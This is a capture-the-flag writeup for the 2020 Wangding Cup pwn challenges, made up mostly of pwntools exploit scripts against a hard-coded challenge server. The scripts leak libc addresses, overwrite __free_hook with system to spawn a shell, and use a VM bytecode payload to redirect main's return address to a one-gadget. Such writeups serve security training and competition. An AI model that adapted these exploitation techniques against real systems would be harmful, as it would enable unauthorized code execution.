
2020网鼎杯pwn

from pwn import *
# Stage 1 of the writeup: leak addresses from the remote challenge service.
# The service appears to accept a C-like program on its input and run it
# (inferred from the sendline below and the printf output the author relies
# on; the interpreter itself is not shown on this page).
#sh = process('./pwn')
# Hard-coded competition endpoint (host, port); not parameterised.
sh = remote('182.92.73.10', 24573)
#gdb.attach(sh)
#context.log_level = 'debug'
# Presumably gives the service time to settle before the program is sent — confirm.
sleep(1)
# The program below is the payload and is sent verbatim. The Chinese '#'
# lines inside it are part of the string literal (not Python comments) and
# are deliberately left untouched. It walks pointers starting from the address
# of a local variable and prints three values with printf("%p\n") so they can
# be read back from the session output.
code = '''
int main()
{
    int a;
    int * b;
    int * c;
    int * e;
    int * put_got;
    int * libc_base;
    int * base;
    b = &a +3;
    c = *b;
    c = c + 18;
    #这个地方各个系统栈存储基地址的位置不太一样,所以是慢慢加1测出远端的程序基地址位置的
    base = *c - 0x040;
    e = base + 0x40c02;#指向函数使用次数,从而任意调用函数
    put_got = base + 0x40bef;
    printf("%p\n", *put_got);
    *e = 1;
    c = c + 6;
    printf("%p\n", *c);
    libc_base = *put_got - 0x06f690;
    printf("%p\n", libc_base);
}
'''
# Send the program followed by a newline, then hand the session to the user
# so the printed values can be read.
# NOTE(review): the writeup does not state its Python version. On Python 2
# `code` is a byte string; on Python 3 it is text that pwntools has to encode
# before sending (it contains non-ASCII characters) — confirm before reusing.
sh.sendline(code)
sh.interactive()

from pwn import *
# Stage 2 of the writeup: same host as stage 1 but a different port. The
# program sent here writes a computed pointer through another computed
# pointer and then calls free("/bin/sh") (see the code string); the prose
# below the script reports that this is what yielded a shell.
#sh = process('./pwn')
# Hard-coded competition endpoint; note the port differs from the first script.
sh = remote('182.92.73.10',362)
#gdb.attach(sh)
# Debug logging is active here (unlike the first script), so pwntools echoes
# every byte sent and received.
context.log_level = 'debug'
sleep(1)
# Payload program, sent verbatim. The '#printf' line inside it belongs to the
# string literal and is left as-is. The constants 0x45390, 0x3c67a8 and
# 0x3ca000 are, judging by the variable names `system` and `free_hook`,
# offsets for the remote's particular libc build — they are only meaningful
# for that exact build; verify against the challenge's libc.
code = '''
int main()
{
    int a;
    int * b;
    int * c;
    int * system;
    int * free_hook;
    b = &a +3;
    c = *b;
    c = c + 24;
    system = 0x45390 + *c - 0x3ca000;
    free_hook = *c + 0x3c67a8 - 0x3ca000;
    *free_hook = system;
    #printf("%p", *free_hook);
    free("/bin/sh");
}
'''
# Send the program with a trailing newline and drop to an interactive session.
# NOTE(review): Python version is not stated; on Python 3 `code` is text and
# must be encodable by pwntools before it is sent.
sh.sendline(code)
sh.interactive()

拿下 flag。其实本来想用 open、read、write 函数做的,但不知道只有运行 shell 并输入 token 才能拿到 flag,浪费了不少时间。

from pwn import *
# Stage 3 of the writeup: a raw byte payload for what the author's notes
# describe as a small register machine (r1, r2, a stack with push/pop). The
# per-line comments below are the author's own notes, translated to English;
# nothing on this page allows the opcode meanings to be verified against the
# challenge binary.
#sh = process('./pwn')
# Same hard-coded endpoint as the second script.
sh = remote('182.92.73.10',362)
#gdb.attach(sh)

# Every chunk appended below is exactly 8 bytes (a leading byte followed by
# operand/padding bytes), which suggests a fixed 8-byte instruction encoding
# — confirm against the binary.
# NOTE(review): the literals are Python 2 str. On Python 3, '\xff' is the
# code point U+00FF and would not be sent as the single byte 0xFF, so this
# payload would need bytes literals (b'...') there.
mov_r1_r2_index = '\x00' * 8 
payload = mov_r1_r2_index + '\xfc' + '\xff' + '\xff' * 6
# copy &r2 - 3 into r1 so that r1 holds a stack address
payload += '\x09' + '\x00' * 7
# dereference opcode, roughly r1 = *r1; this yields the stack address
payload += '\x0d' + '\x00' * 7
# push r1
payload += '\x01' + '\x00' * 7
payload += '\x18' + '\xff' + '\xff' * 6
# assign r1: the value is the offset between the stack address r1 held above
# and the slot holding main's return address
payload += '\x19' + '\x00' * 7
# add r1 to the value on top of the stack and store the sum in r1, popping it;
# r1 now holds the stack address of main's return address
payload += '\x0d' + '\x00' * 7
# push r1
payload += '\x09' + '\x00' * 7
# dereference r1; r1 is now main's return address, which lies in libc, so
# adding the one-gadget offset and writing it back hijacks control flow
payload += '\x0d' + '\x00' * 7
# push r1
payload += '\x01' + '\x00' * 7
payload += '\x17' + '\x09' + '\x0d' + '\x00' * 5
# set r1 to the one-gadget offset
payload += '\x19' + '\x00' * 7
# add the offset and pop; r1 is now the one-gadget address
payload += '\x0B' + '\x00' * 7
# store r1 at the address held on the stack, roughly *[rsp] = r1
# Sent with send() rather than sendline(), so no trailing newline is appended.
sh.send(payload)
sh.interactive()
